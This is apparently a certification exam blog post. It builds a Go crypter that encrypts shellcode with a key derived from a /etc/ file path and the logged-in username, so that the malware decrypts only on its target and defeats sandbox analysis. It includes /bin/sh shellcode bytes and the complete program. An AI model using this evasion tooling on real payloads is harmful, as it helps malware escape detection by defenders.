SLAE 7: Creating your own crypter using golang

Programming / January 27, 2020 • 4 min read
Tags: slae shellcoding

In this article, we will build a simple crypter for encrypting and decrypting shellcode. I chose to implement the crypter in Go using environmental keys.

I will not spend time implementing a fancy shellcode execution method in this article, only encryption and decryption methods are in scope for now.

Encryption

The encryption/decryption process is using AES GCM and a specific file in /etc/ concatenated with the current user logged in as the key. This is called Environmental Keying, meaning you use specific values found in the victim’s environment such as files, hostname or users. The purpose of this is to make sure that your malware only executes in a specific environment. This means the attacker needs to know some details about the environment before encrypting any shellcode.

Analysing the shellcode will be difficult because the correct environment values are needed in order to successfully decrypt the shellcode. Relying on dynamic analysis in a sandbox is futile because of this reason.

The specific values that I have chosen for the key is the file path /etc/vmware-tools/scripts/vmware/network and current logged in user. The final key will look like this: /etc/vmware-tools/scripts/vmware/networkdubs3c.

The following example encrypts a simple shellcode that executes /bin/sh:

dubs3c@slae:~/SLAE/EXAM/github/assignment_7$ go run main.go -e -s "\xfc\xbb\x1b\x91\xcd\xc8\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x2a\x43\x9f\xa0\x22\x4c\x53\x59\xd2\xbd\xbc\xfb\x4b\x4b\x21\xca\x42\x7a\x66\x9d\x5f\xb0\xe6\xde\x5f\x4a\xe7\xde"
[+] Your encrypted shellcode: 5af9fb00a2147e12ba73c2686b1b25fac3f441ffcb6974b00ec7413208dc749dae128faf67a5db80fe868dc2386e30546409503beb9ea6973441dc0ace3b35563550e3041fdde2c234b7dbd36ce74f1653ac08ec3be1f6fac3dd6fc34b378477bf6a5acf7800d01ee1c9280d8f6e2ccb8b13f517e790cc6d6623df9b1ced1dc1ebd8df2caca412f6f9d8233bd233fd6c590b12211f0706fc18dca864e97908df4eb638c8b223afc57d59714db119a0075dc935a65a38b4fe175fc15ad2b03125303b98c991ac01238f61c10f444bd85ad081fe2d097f816345e2ab98436cae10033c1cd870502608eac6a3149688b992
dubs3c@slae:~/SLAE/EXAM/github/assignment_7$

Decryption

The decryption function will loop over all files and folders in /etc/ and try each file path as the key together with the current username. When the correct key is found, the shellcode is decrypted.

Decrypting shellcode:

dubs3c@slae:~/SLAE/EXAM/github/assignment_7$ go run main.go -d -s "5af9fb00a2147e12ba73c2686b1b25fac3f441ffcb6974b00ec7413208dc749dae128faf67a5db80fe868dc2386e30546409503beb9ea6973441dc0ace3b35563550e3041fdde2c234b7dbd36ce74f1653ac08ec3be1f6fac3dd6fc34b378477bf6a5acf7800d01ee1c9280d8f6e2ccb8b13f517e790cc6d6623df9b1ced1dc1ebd8df2caca412f6f9d8233bd233fd6c590b12211f0706fc18dca864e97908df4eb638c8b223afc57d59714db119a0075dc935a65a38b4fe175fc15ad2b03125303b98c991ac01238f61c10f444bd85ad081fe2d097f816345e2ab98436cae10033c1cd870502608eac6a3149688b992"
[+] Decrypted shellcode: \xfc\xbb\x1b\x91\xcd\xc8\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x2a\x43\x9f\xa0\x22\x4c\x53\x59\xd2\xbd\xbc\xfb\x4b\x4b\x21\xca\x42\x7a\x66\x9d\x5f\xb0\xe6\xde\x5f\x4a\xe7\xde
dubs3c@slae:~/SLAE/EXAM/github/assignment_7$

Final code

Below is the final program for encrypting/decrypting shellcode.

  1package main
  2
  3import (
  4    "crypto/aes"
  5    "crypto/cipher"
  6    "crypto/rand"
  7    "crypto/sha256"
  8    "encoding/hex"
  9    "flag"
 10    "fmt"
 11    "io"
 12    "os"
 13    "os/user"
 14    "path/filepath"
 15)
 16
 17type cliOptions struct {
 18    encrypt   bool
 19    decrypt   bool
 20    shellcode string
 21}
 22
 23func processArgs() cliOptions {
 24    opts := cliOptions{}
 25    flag.BoolVar(&opts.decrypt, "decrypt", false, "Decrypt your shellcode")
 26    flag.BoolVar(&opts.decrypt, "d", false, "Decrypt your shellcode")
 27    flag.BoolVar(&opts.encrypt, "encrypt", false, "Encrypt your shellcode")
 28    flag.BoolVar(&opts.encrypt, "e", false, "Encrypt your shellcode")
 29    flag.StringVar(&opts.shellcode, "shellcode", "", "Your shellcode")
 30    flag.StringVar(&opts.shellcode, "s", "", "Your shellcode")
 31    flag.Parse()
 32
 33    return opts
 34}
 35
 36func init() {
 37    flag.Usage = func() {
 38        h := "\nEncrypt your shellcode! Very nice! Made by @dubs3c.\n\n"
 39
 40        h += "Usage:\n"
 41        h += "  cyrptoBoot [shellcode] [options]\n\n"
 42
 43        h += "Options:\n"
 44        h += "  -e,  --encrypt      Encrypt shellcode\n"
 45        h += "  -d,  --decrypt      Decrypt shellcode\n"
 46        h += "  -s,  --shellcode    Shellcode\n"
 47        h += "  -v,  --version      Show version\n"
 48
 49        h += "\nExamples:\n"
 50        h += "  cryptoBoot -e -s \"<shellcode>\"\n"
 51        h += "  cryptoBoot -d -s \"<shellcode>\"\n"
 52
 53        fmt.Fprintf(os.Stderr, h)
 54    }
 55}
 56
 57func encrypt(shellcode string, envKey []byte) (encryptedShellcode []byte, err error) {
 58    plaintext := []byte(shellcode)
 59
 60    block, err := aes.NewCipher(envKey)
 61    if err != nil {
 62        panic(err.Error())
 63    }
 64
 65    // Never use more than 2^32 random nonces with a given key because of the risk of a repeat.
 66    nonce := make([]byte, 12)
 67    if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
 68        panic(err.Error())
 69    }
 70
 71    aesgcm, err := cipher.NewGCM(block)
 72    if err != nil {
 73        panic(err.Error())
 74    }
 75
 76    ciphertext := aesgcm.Seal(nil, nonce, plaintext, nil)
 77    ciphertextWithNonce := append(nonce, ciphertext...)
 78    encodedCiphertext := make([]byte, hex.EncodedLen(len(ciphertextWithNonce)))
 79    hex.Encode(encodedCiphertext, ciphertextWithNonce)
 80    return encodedCiphertext, nil
 81}
 82
 83func decrypt(ciphertext string, envKey []byte) (plaintext []byte, err error) {
 84    ciphertxt, _ := hex.DecodeString(ciphertext[24:])
 85    nonce, _ := hex.DecodeString(ciphertext[:24])
 86
 87    block, err := aes.NewCipher(envKey)
 88    if err != nil {
 89        return []byte{}, err
 90    }
 91
 92    aesgcm, err := cipher.NewGCM(block)
 93    if err != nil {
 94        return []byte{}, err
 95    }
 96
 97    plaintxt, err := aesgcm.Open(nil, nonce, ciphertxt, nil)
 98    if err != nil {
 99        return []byte{}, err
100    }
101
102    return plaintxt, nil
103}
104
105func main() {
106
107    if len(os.Args) <= 1 {
108        flag.Usage()
109        os.Exit(0)
110    }
111
112    opts := processArgs()
113
114    currentUser := &user.User{}
115    currentUser, err := user.Current()
116    envPath := "/etc/vmware-tools/scripts/vmware/network"
117    envKey := sha256.Sum256([]byte(envPath + currentUser.Username))
118
119    if opts.encrypt {
120        if opts.shellcode == "" {
121            fmt.Println("[-] Please specify your shellcode")
122            os.Exit(1)
123        }
124
125        ciphertext, err := encrypt(opts.shellcode, envKey[:])
126        if err != nil {
127            fmt.Println("[-] Something went wrong encrypting your shellcode. Error: ", err)
128            os.Exit(1)
129        }
130
131        fmt.Printf("[+] Your encrypted shellcode: %s\n", ciphertext)
132        return
133    }
134
135    if opts.decrypt {
136
137        if opts.shellcode == "" {
138            fmt.Println("[-] Please specify your encrypted shellcode")
139            os.Exit(1)
140        }
141
142        encryptedShellcode := opts.shellcode
143
144        err = filepath.Walk("/etc/", func(path string, info os.FileInfo, err error) error {
145            envKey := sha256.Sum256([]byte(path + currentUser.Username))
146            plaintext, err := decrypt(encryptedShellcode, envKey[:])
147            if err != nil {
148                // Disregard errors
149                return nil
150            } else {
151                fmt.Printf("[+] Decrypted shellcode: %s\n", plaintext)
152            }
153            return nil
154        })
155
156        if err != nil {
157            fmt.Printf("error walking the path %q: %v\n", "/etc/", err)
158            return
159        }
160    }
161}

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

https://www.pentesteracademy.com/course?id=3

Student ID: SLAE-1490